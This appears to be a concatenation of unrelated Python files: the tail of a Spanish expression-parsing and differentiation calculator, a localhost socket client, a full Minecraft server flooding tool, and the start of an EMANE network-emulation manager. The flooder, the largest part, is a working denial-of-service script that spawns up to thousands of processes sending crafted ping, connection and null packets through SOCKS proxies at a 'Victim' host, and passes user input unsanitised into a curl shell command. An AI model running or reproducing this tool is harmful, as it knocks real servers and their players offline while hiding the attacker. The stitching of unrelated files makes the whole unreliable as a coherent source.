return s+str(c)[:decimales]
else:
return c*signo
return constante
if string==variable:
print('variable',string,sig)
def variable(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>=0.0 else '-'
else:
s=''
if dy:
if p:
return '1.0'
else:
return 1.0
else:
if p:
return s+str(x)[:decimales]
else:
return x*signo
return variable
else:
# precedence: parentheses, exponents/radicals, multiplication/division, addition/subtraction
if esSuma:
print('suma',string,signoSuma)
if len(signoSuma)==1:
sumandos=[strToMath(string=string[1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
else:
sumandos=[]
for sumando in range(0,len(signoSuma)-1,1):
sumandos+=[strToMath(string=string[signoSuma[sumando]:signoSuma[sumando+1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
sumandos+=[strToMath(string=string[signoSuma[-1]:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
def suma(x,dy=dy,p=p,decimales=decimales,sumandos=sumandos,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
ret = s+'('
for sumando in sumandos:
ret += ' '+sumando(x,p=p,dy=dy,decimales=decimales,mostrarSigno=1)
return ret+')'
else:
return signo*sum([sumando(x,dy=dy) for sumando in sumandos])
else:
if p:
ret = s+'('
for sumando in sumandos:
ret += ' '+sumando(x,p=p,decimales=decimales,mostrarSigno=1)
return ret+')'
else:
ret = 0.0
for sumando in sumandos:
ret += sumando(x)
return signo*ret
return suma
elif esDivision:
print('division',string,signoDivision)
signoDivision+=[]
numerador=strToMath(string=string[0:signoDivision[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
denominador=strToMath(string=string[signoDivision[1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def division(x,dy=dy,p=p,decimales=decimales,numerador=numerador,denominador=denominador,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(('+numerador(x,p=p,dy=1,decimales=decimales)+')*('+denominador(x,p=p,dy=0,decimales=decimales)+')-('+numerador(x,p=p,dy=0,decimales=decimales)+')*('+denominador(x,p=p,dy=1,decimales=decimales)+'))/(('+denominador(x,p=p,dy=0,decimales=decimales)+')**2)'
else:
return signo*((numerador(x,p=p,dy=1,decimales=decimales)*denominador(x,p=p,dy=0,decimales=decimales))-(numerador(x,p=p,dy=0,decimales=decimales)*denominador(x,p=p,dy=1,decimales=decimales)))/(denominador(x,p=p,dy=0,decimales=decimales)**2)
else:
if p:
return s+'('+numerador(x,p=p,dy=0,decimales=decimales)+'/'+denominador(x,p=p,dy=0,decimales=decimales)+')'
else:
return signo*numerador(x,dy=0,decimales=decimales)/denominador(x,dy=0,decimales=decimales)
return division
elif esResto:
print('resto',string,signoResto)
signoResto+=[]
numerador=strToMath(string=string[0:signoResto[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
denominador=strToMath(string=string[signoResto[1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def restoPorDefecto(x,dy=dy,p=p,decimales=decimales,numerador=numerador,denominador=denominador,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return ''
else:
return None
else:
if p:
return s+'('+numerador(x,p=p,dy=0,decimales=decimales)+'%'+denominador(x,p=p,dy=0,decimales=decimales)+')'
else:
return signo*numerador(x,dy=0,decimales=decimales)%denominador(x,dy=0,decimales=decimales)
return restoPorDefecto
elif esProducto:
print('producto',string,signoProducto)
factores=[]
for factor in range(0,len(signoProducto)-1,1):
factores+=[strToMath(string=string[signoProducto[factor]+(1 if 0<factor else 0 ):signoProducto[factor+1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
factores+=[strToMath(string=string[signoProducto[-1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
def producto(x,dy=dy,p=p,decimales=decimales,signo=sig,factores=factores,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
ret=s+'('
factor='('
for derivar in range(0,len(factores),1):
factor=factores[derivar](x,dy=1,p=p,decimales=decimales)
for escalar in range(0,len(factores),1):
if not (derivar == escalar):
factor += '*'+factores[escalar](x,dy=0,p=p,decimales=decimales)
ret += factor+')+'
return ret[:-1]+')'
else:
ret=0.0
factor=1.0
for derivar in range(0,len(factores),1):
factor=factores[derivar](x,dy=1,p=p,decimales=decimales)
for escalar in range(0,len(factores),1):
if not (derivar == escalar):
factor*=factores[escalar](x,dy=0,p=p,decimales=decimales)
ret += factor
return signo*ret
else:
if p:
ret = s+'('+factores[0](x,dy=0,p=p,decimales=decimales)
for factor in factores[1:]:
ret += '*'+factor(x,dy=0,p=p,decimales=decimales)
return ret+')'
else:
ret = 1.0
for factor in factores:
ret *= factor(x,dy=0,p=0)
return signo*ret
return producto
elif esExponente:
print('exponente',string,signoExponente)
signoExponente+=[]
base=strToMath(string=string[0:signoExponente[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
exponente=strToMath(string=string[signoExponente[1]+2:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def potencia(x,dy=dy,p=p,decimales=decimales,signo=sig,base=base,exponente=exponente,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'((('+exponente(x,dy=0,p=p,decimales=decimales)+'*('+base(x,dy=0,p=p,decimales=decimales)+'**('+exponente(x,dy=0,p=p,decimales=decimales)+'-1))*'+base(x,dy=1,p=p,decimales=decimales)+') + ('+exponente(x,dy=1,p=p,decimales=decimales)+'*('+base(x,dy=0,p=p,decimales=decimales)+'**'+exponente(x,dy=0,p=p,decimales=decimales)+')*ln('+base(x,dy=0,p=p,decimales=decimales)+'))))'
else:
ret = exponente(x,dy=0,p=p,decimales=decimales)*(base(x,dy=0,p=p,decimales=decimales)**(exponente(x,dy=0,p=p,decimales=decimales)-1))*base(x,dy=1,p=p,decimales=decimales) + exponente(x,dy=1,p=p,decimales=decimales)*(base(x,dy=0,p=p,decimales=decimales)**exponente(x,dy=0,p=p,decimales=decimales))*math.log(base(x,dy=0,p=p,decimales=decimales))
return signo*ret
else:
if p:
return s+base(x,p=p,decimales=decimales)+'**('+exponente(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*base(x)**exponente(x)
return potencia
#pruebaTreeview()
#ventanaPersonalizada()
#caja()
def g(x):
return (x*math.e**x)/(math.e**x+math.e**(-x))
f=calculadora()
f.setEcuacion('senhP',string='sen(360/x)+x',variable='x',constantes={'alto':80.0})
f.setEcuacion('coshP',string='senhP(x+bajo)/cos(x)',variable='x',constantes={'bajo':10.0})
print(f.ec['senhP'](3,p=1,dy=1),'=',f.ec['senhP'](3,p=0,dy=1))
print(f.ec['coshP'](3,p=1,dy=1),'=',f.ec['coshP'](3,p=0,dy=1))
#print('(x*e**x)/(e**x+e**(-x))','=',g(3))
|
facs_client.py
|
import socket
import threading
import logging
logger = logging.getLogger(__name__)
LOCAL_BIND_ADDR = ('127.0.0.1', 8000)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect(LOCAL_BIND_ADDR)
logger.warning('[NEW CONNECTION] Connected to the server')
def send_data():
threading.Timer(5.0, send_data).start()
data = "Message from client"
server.sendall(data.encode())
def receive():
while True:
try:
data_from_server = server.recv(1024)
if not data_from_server:
raise OSError('Socket error!')
logger.warning('<SERVER> %s', data_from_server.decode())
except (socket.error, IOError, OSError):
logger.warning('[DISCONNECT] Connection closed\n')
server.close()
break
receive_thread = threading.Thread(target=receive)
receive_thread.start()
send_data()
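# facs_client.py expects a TCP server already listening on LOCAL_BIND_ADDR.
# A minimal echo-server sketch for local testing (hypothetical, run it as a
# separate script before starting this client):
#
#   import socket
#   srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#   srv.bind(('127.0.0.1', 8000))
#   srv.listen(1)
#   conn, _addr = srv.accept()
#   while True:
#       data = conn.recv(1024)
#       if not data:
#           break
#       conn.sendall(b'ack: ' + data)  # anything sent back is logged by receive()
#   conn.close()
#   srv.close()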
|
Flooder.py
|
#!/usr/bin/python3
import requests, string, socket, socks, time, random, threading, sys, datetime, argparse, os, multiprocessing
mode = "Flood"
parser = argparse.ArgumentParser(description=("PacketFlooder"))
parser.add_argument("-host", type=str,
help="• Victim [HOST]")
parser.add_argument("-p", "--port", type=int,
default="25565", help="• Victim [PORT]")
parser.add_argument("-m", "--method", type=int,
default="2", help="• Attack Method")
parser.add_argument("-threads", "--threads", type=int,
default="1000", help="• Threads")
parser.add_argument("-type", "--type", type=int,
default="4", help="• Type [SOCKS]")
parser.add_argument("-amp", "--amplification", type=str,
default="100", help="• Amplification")
#parser.add_argument("-print", "--print", type=str,
# default="true", help="• Print Optimization")
parser.add_argument("-pFile", "--proxiesFile", type=str,
default="socks4.txt", help="• Proxies File")
parser.add_argument("-noP", "--noProxy", type=str,
default="false", help="• Attack without proxies [Faster]")
args = parser.parse_args()
printOption = "false"
def build_threads(mode,thread_num,event,socks_type):
if mode == "Flood":
if __name__ == '__main__':
processes = []
for i in range(thread_num):
p = multiprocessing.Process(target = flood,args=(event,socks_type,))
processes.append(p)
p.start()
def flood(event,socks_type):
if (opcion == 2):
proxy = random.choice(proxies).strip().split(":")
nicks = random.choice(lista)
Caracteres = len(nicks)
Tamano = bytes([Caracteres + 2])
Zero = b'\x00'
NickL = bytes([Caracteres])
encodeNick = nicks[:-1].encode(encoding="utf-8")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if socks_type == 6:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
try:
for _ in range(amplification):
s.send(Mensaje + Tamano + Zero + NickL + encodeNick)
except:
s.close()
#print ("[»] " + str(Method) + " | Proxy - " +str(proxy[0])+":"+str(proxy[1])) // I wouldn't activate it, it spams too much!
except:
s.close()
if (opcion == 1):
proxy = random.choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if socks_type == 6:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
try:
for _ in range(amplification):
s.send(Mensaje)
except:
s.close()
#print ("[»] " + str(Method) + " | Proxy - " +str(proxy[0])+":"+str(proxy[1])) // I wouldn't activate it, it spams too much!
except:
s.close()
def opciones():
global ip
global port
global proxies
global amplification
global socks_type
global choice
global opcion
global thread_num
global Test
global Test2
global lista
global Mensaje
global Method
color = '\33[31m'
green = '\33[32m'
white = '\33[37m'
print(color + """
▄▄▄▄ ▓█████▄▄▄█████▓ ▄▄▄ ▄▄▄█████▓ ▒█████ ▒█████ ██▓
▓█████▄ ▓█ ▀▓ ██▒ ▓▒▒████▄ ▓ ██▒ ▓▒▒██▒ ██▒▒██▒ ██▒▓██▒
▒██▒ ▄██▒███ ▒ ▓██░ ▒░▒██ ▀█▄ ▒ ▓██░ ▒░▒██░ ██▒▒██░ ██▒▒██░
▒██░█▀ ▒▓█ ▄░ ▓██▓ ░ ░██▄▄▄▄██░ ▓██▓ ░ ▒██ ██░▒██ ██░▒██░
░▓█ ▀█▓░▒████▒ ▒██▒ ░ ▓█ ▓██▒ ▒██▒ ░ ░ ████▓▒░░ ████▓▒░░██████▒
░▒▓███▀▒░░ ▒░ ░ ▒ ░░ ▒▒ ▓▒█░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒░▒░▒░ ░ ▒░▓ ░
▒░▒ ░ ░ ░ ░ ░ ▒ ▒▒ ░ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ░ ▒ ░
░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
""")
opcion = int(input(green + """
┌──────────────────────────────────────────────┐
│ 1. DemonShredder - Sends PING packets │
│ 2. HadesDestroyer - Sends Connection Packets │
│ 3. NullPing - Sends invalid packets │
└──────────────────────────────────────────────┘
💀 » Choose your method: """))
print("")
print(white + "")
ip = str(input("» IP: "))
if ip == "":
print("» Please enter correct host or ip")
sys.exit(1)
if mode == "flood":
pass
r1 = os.popen("curl -s https://api.mcsrvstat.us/2/" + ip).read()
start1 = ("\"ip\":\"")
end1 = "\","
ip = (r1.split(start1))[1].split(end1)[0]
encodeIP = ip.encode(encoding="utf-8", errors="strict")
lista = open("Nicks.txt").readlines()
PingSlapper = b'\xfe\x01\xfa\x00\x0b\x00M\x00C\x00|\x00P\x00i\x00n\x00g\x00H\x00o\x00s\x00t\x00#\x7f\x00\x0e\x001\x004\x007\x00.\x001\x003\x005\x00.\x003\x001\x00.\x001\x007\x005\x00\x00\x03\xe7'
CPSFlooder = b'\x0f\x00/\tlocalhostc\xdf\x02'
#Part2 = b'\x00/\tlocalhostc\xdf\x02\r\x00\x0bq\x0b/\xfd\x00\xa1#\xfd\xa1v\xfd'
NullPing = b'\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01AttackByLPBots'
if (opcion == 1):
Mensaje = PingSlapper
Method = "DemonShredder"
if (opcion == 2):
Mensaje = CPSFlooder
Method = "HadesDestroyer"
if (opcion == 3):
Mensaje = NullPing
Method = "NullPing"
print("")
port = str(input("» Puerto: "))
if port == '':
port = int(25565)
print("» Default choose port 25565\r\n» Port 25565 was chosen")
else:
port = int(port)
thread_num = int(input("» Threads [default: 1000]: "))
if thread_num == "":
thread_num = int(1000)
choice = ""
while choice == "":
choice = str(input("» Socks 4 or 5? [default: 4]: ")).strip()
if choice == "5":
choice = "5"
if choice != "4" and choice != "5":
print("[»] Error TYPE_INVALID try again")
choice = ""
if choice == "4":
socks_type = 4
else:
socks_type = 5
if choice == "4":
out_file = str("socks4.txt")
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = ("socks5.txt")
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = "socks4.txt"
proxies = open(out_file).readlines()
print ("» TYPE %s // Proxies: %s" %(choice,len(proxies)))
amplification = str(input("» Loop (How many requests per thread):"))
if amplification == "":
amplification = int(100)
else:
amplification = int(amplification)
NoProxy = str(input("» NoProxy (BETA [Attack without Proxies <FASTER> ]) true/false: "))
if (NoProxy == "true"):
socks_type = 6 # No Proxies
beta = "True"
else:
socks.type = choice
beta = "False"
print("» IP - " + str(ip))
print("» Port - " + str(port))
print("» Method - " + str(Method))
print("» Threads - " + str(thread_num))
print("» Socks - " + str(socks_type))
print("» Amplification - " + str(amplification))
print("» NoProxy - " + str(beta))
print("")
input("» Press enter «")
print("")
start()
def start():
event = threading.Event()
print("» Initiating Threads")
print("» Starting Attack [Print Mode Disabled, Change in Flooder.py]")
build_threads(mode,thread_num,event,socks_type)
event.clear()
event.set()
while True:
try:
time.sleep(0)
except KeyboardInterrupt:
break
if len(sys.argv) == 1:
opciones()
else:
global ip
global port
global socks_type
global proxies
global amplification
global choice
global opcion
global thread_num
global Test
global Test2
global Mensaje
global Method
global lista
ip = args.host
r1 = os.popen("curl -s https://api.mcsrvstat.us/2/" + ip).read()
start1 = ("\"ip\":\"")
end1 = "\","
ip = (r1.split(start1))[1].split(end1)[0]
lista = open("Nicks.txt").readlines()
PingSlapper = b'\xfe\x01\xfa\x00\x0b\x00M\x00C\x00|\x00P\x00i\x00n\x00g\x00H\x00o\x00s\x00t\x00#\x7f\x00\x0e\x001\x004\x007\x00.\x001\x003\x005\x00.\x003\x001\x00.\x001\x007\x005\x00\x00\x03\xe7'
CPSFlooder = b'\x0f\x00/\tlocalhostc\xdf\x02'
Part2 = b'\x01\xbc\x02\x0b\x00\tGhostyCeh' # can be randomized using a list of nicknames, but that's up to you
NullPing = b'\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01AttackByLPBots'
port = args.port
opcion = args.method
if (opcion == 1):
Mensaje = PingSlapper
Method = "DemonShredder"
if (opcion == 2):
Mensaje = CPSFlooder
Method = "HadesDestroyer"
if (opcion == 3):
Mensaje = NullPing
Method = "NullPing"
thread_num = args.threads
socks_type = args.type
out_file = args.proxiesFile
proxies = open(out_file).readlines()
amplification = int(args.amplification)
NoProxy = args.noProxy
if (NoProxy == "true"):
socks_type = 6 # No Proxies
beta = "True"
else:
socks.type = args.type
beta = "False"
print("» IP - " + str(ip))
print("» Port - " + str(port))
print("» Method - " + str(Method))
print("» Threads - " + str(thread_num))
print("» Socks - " + str(socks_type))
print("» Amplification - " + str(amplification))
print("» NoProxy - " + str(beta))
print("")
input("» Press enter «")
print("")
start()
|
emanemanager.py
|
"""
emanemanager.py: definition of an EmaneManager class for implementing configuration control of an EMANE emulation.
"""
import logging
import os
import threading
from core import CoreCommandError
from core import constants
from core.api import coreapi
from core.api import dataconversion
from core.conf import ConfigGroup
from core.conf import ConfigShim
from core.conf import Configuration
from core.conf import ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.enumerations import ConfigDataTypes
from core.enumerations import ConfigFlags
from core.enumerations import ConfigTlvs
from core.enumerations import MessageFlags
from core.enumerations import MessageTypes
from core.enumerations import NodeTypes
from core.enumerations import RegisterTlvs
from core.misc import nodeutils
from core.misc import utils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel
]
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
Create an EmaneManager instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
